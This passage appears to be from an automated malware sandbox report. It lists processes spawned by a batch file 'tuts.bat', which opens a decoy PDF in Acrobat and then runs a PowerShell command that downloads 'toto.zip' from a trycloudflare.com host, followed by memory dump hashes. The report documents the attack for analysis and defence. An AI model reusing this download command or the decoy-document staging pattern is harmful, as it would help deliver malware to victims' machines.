                    Path:C:\Windows\System32\chcp.com
                    Wow64 process (32bit):false
                    Commandline:chcp.com 437
                    Imagebase:0x7ff796160000
                    File size:14'848 bytes
                    MD5 hash:33395C4732A49065EA72590B14B64F32
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:3
                    Start time:03:23:07
                    Start date:01/11/2024
                    Path:C:\Windows\System32\find.exe
                    Wow64 process (32bit):false
                    Commandline:fiNd
                    Imagebase:0x7ff69eb30000
                    File size:17'920 bytes
                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:4
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Windows\System32\find.exe
                    Wow64 process (32bit):false
                    Commandline:find
                    Imagebase:0x7ff69eb30000
                    File size:17'920 bytes
                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:5
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Windows\System32\findstr.exe
                    Wow64 process (32bit):false
                    Commandline:findstr /L /I set "C:\Users\user\Desktop\tuts.bat"
                    Imagebase:0x7ff7f4d00000
                    File size:36'352 bytes
                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:6
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Windows\System32\findstr.exe
                    Wow64 process (32bit):false
                    Commandline:findstr /L /I goto "C:\Users\user\Desktop\tuts.bat"
                    Imagebase:0x7ff7f4d00000
                    File size:36'352 bytes
                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:7
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Windows\System32\findstr.exe
                    Wow64 process (32bit):false
                    Commandline:findstr /L /I echo "C:\Users\user\Desktop\tuts.bat"
                    Imagebase:0x7ff7f4d00000
                    File size:36'352 bytes
                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:8
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Windows\System32\findstr.exe
                    Wow64 process (32bit):true
                    Commandline:findstr /L /I pause "C:\Users\user\Desktop\tuts.bat"
                    Imagebase:0xb50000
                    File size:36'352 bytes
                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:9
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c type tmp
                    Imagebase:0x7ff666ba0000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:10
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c type tmp
                    Imagebase:0x7ff666ba0000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:11
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"
                    Imagebase:0x7ff6bc1b0000
                    File size:5'641'176 bytes
                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:12
                    Start time:03:23:08
                    Start date:01/11/2024
                    Path:C:\Windows\System32\timeout.exe
                    Wow64 process (32bit):false
                    Commandline:timeout /t 5
                    Imagebase:0x7ff7c8200000
                    File size:32'768 bytes
                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:13
                    Start time:03:23:11
                    Start date:01/11/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                    Imagebase:0x7ff74bb60000
                    File size:3'581'912 bytes
                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:15
                    Start time:03:23:13
                    Start date:01/11/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
                    Imagebase:0x7ff788560000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:16
                    Start time:03:23:13
                    Start date:01/11/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2164 --field-trial-handle=1584,i,575126615186197544,683786838626507956,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                    Imagebase:0x7ff74bb60000
                    File size:3'581'912 bytes
                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Reset < >
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1934328010.00007FFD9A5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_7ffd9a5a0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 441ba48be4379c336e79d69057a4d419d0964cf9cb0f63d687986e34f83765c2
                      • Instruction ID: d02d20b5d2f0bff96772cb11666a81c8286bc81c05fcf62daf08eebe618900e3
                      • Opcode Fuzzy Hash: 441ba48be4379c336e79d69057a4d419d0964cf9cb0f63d687986e34f83765c2
                      • Instruction Fuzzy Hash: 83C19F31B0894D8FDF99DF98C495AADBBE1FFA8314F1541A9D40DD7295CA34E881CB80
                      Memory Dump Source
                      • Source File: 0000000F.00000002.1934328010.00007FFD9A5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_15_2_7ffd9a5a0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                      • Instruction ID: 343396784749959119fbcd44917c8ef0e40f0bd424dc858bb4bc8f1f20ab19e8
                      • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                      • Instruction Fuzzy Hash: 4D01A77120CB0C8FD788EF0CE451AA5B3E0FB85364F10056DE58AC3695D632E881CB46